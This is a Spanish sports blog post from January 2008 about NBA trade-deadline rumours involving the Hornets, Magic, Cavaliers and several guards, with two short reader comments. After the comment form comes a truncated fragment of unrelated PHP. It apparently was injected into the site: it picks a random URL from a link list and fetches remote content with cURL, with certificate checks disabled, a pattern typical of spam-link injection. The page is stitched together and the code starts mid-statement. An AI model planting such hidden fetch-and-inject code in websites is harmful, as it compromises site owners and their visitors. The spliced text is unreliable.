Se acerca la fecha límite para traspasos

06 de January de 2008 por txusma

Queda poco más de mes y medio para se acabe el período de traspasos en la NBA y nos encontramos con varios frentes abiertos en espera de resolverse. El entrenador de los New Orleans Hornets, Byron Scott, ha manifestado que buscaran algun tipo de trade para mejorar su banquillo y no tener tantos minutos en pista a Chris Paul y David West. Por su parte los extraños movimientos de los Magic los últimos días haciendo jugar de titulares a Carlos Arroyo o Keyon Dooling ha hecho crecer los rumores sobre un posible trade que implique a alguno de estos jugadores. Incluso JJ Redick, infravalorado por su entrenador, puede verse fuera de la franquicia de Florida. A cambio, en Orlando parecen interesados en el alero de Golden State, Mickael Pietrus.

También es el momento de que los jugadores empiecen a mostrar su enfado por la situación que pasan en el equipo y que pidan incluso abiertamente el traspaso. Sin llegar aún a esta situación los nombres de Damon Stoudamire y Greg Buckner salen a la palestra. Ambos, en equipos claramente perdedores y fuera de la rotación, han fijado su vista en equipos de Playoffs, Boston el primero y Denver el segundo. Está claro que sería un traspaso beneficioso para todos pero está por ver si se acaba produciendo.

Stoudamire podría hacer un buen servicio en los Cavaliers, pero no es esto lo que buscan. Cualquiera que haya seguido los artículos de rumores en los últimos meses sabrá que el elegido en la franquicia de Ohio es Mike Bibby. Hay contactos entre las 2 franquicias aunque parece ser que nada serio todavía. Por si acaso, en Golden State se ha especulado con la posibilidad de que Baron Davis abandone la franquicia destino Cleveland aunque esto parece una idea más bien soñadora que una posibilidad real. Otro base que también ha estado en el mentidero continuamente en Andre Miller. Ahora los Bulls podrían estar también interesados en el caso de que no consiguieran traerse un jugador interior (¿lease Gasol?).

En todo caso, habrá que estar atentos a los movimientos que se produzcan en las próximas semanas. Seguro que nos llevamos más de una sorpresa.

Comenta

2 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Si los Warriors sueltan a Baron es pa matarlos.

      Citar

  2. txusma dice:
    #2

    Lentamente, ademas

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>